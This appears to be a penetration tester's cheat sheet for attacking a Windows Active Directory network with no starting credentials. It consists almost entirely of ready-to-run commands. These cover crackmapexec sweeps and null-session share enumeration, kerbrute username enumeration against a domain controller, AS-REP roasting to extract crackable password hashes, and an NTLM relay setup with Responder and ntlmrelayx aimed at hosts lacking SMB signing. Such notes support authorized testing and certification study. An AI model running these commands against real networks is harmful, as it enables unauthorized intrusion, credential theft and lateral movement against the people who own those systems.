w/o Creds

First enumeration
RHOSTS="192.168.1.0/24"
crackmapexec smb $RHOSTS
crackmapexec smb $RHOSTS --shares
crackmapexec smb $RHOSTS -u '' -p '' --shares # Null Session
crackmapexec smb $RHOSTS -u 'a' -p '' --shares
crackmapexec rdp $RHOSTS
crackmapexec winrm $RHOSTS
crackmapexec ldap $RHOSTS
crackmapexec wmi $RHOSTS

enum4linux 1.2.3.4
rpcdump.py 1.2.3.4 | grep Provider | sort -u

Active Directory

If you have kerberos port open on a DC, you can try to list users
kerbrute userenum --dc 1.2.3.4 --domain domain.com /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
Then try to AS-REP if you found users
GetNPUsers.py -debug 'domain.com/' -usersfile /tmp/users -outputfile /tmp/hashes.aspreroast -format hashcat -dc-ip 1.2.3.4

NetNTLM Relay

Responder will respond to any broadcast request (MDNS, LLMNR ..) and trigger authentification
ntlmrelayx will relay NetNTLMv2 auth to targets
possible targets are servers without SMB signature, cme (crackmapexec)
cme smb 192.168.0.0/24 --gen-relay-list /tmp/targets.txt
ntlmrelayx.py -smb2support --no-http-server -ip 192.168.45.208 -w -tf /tmp/targets.txt
sudo responder -I tun0 -w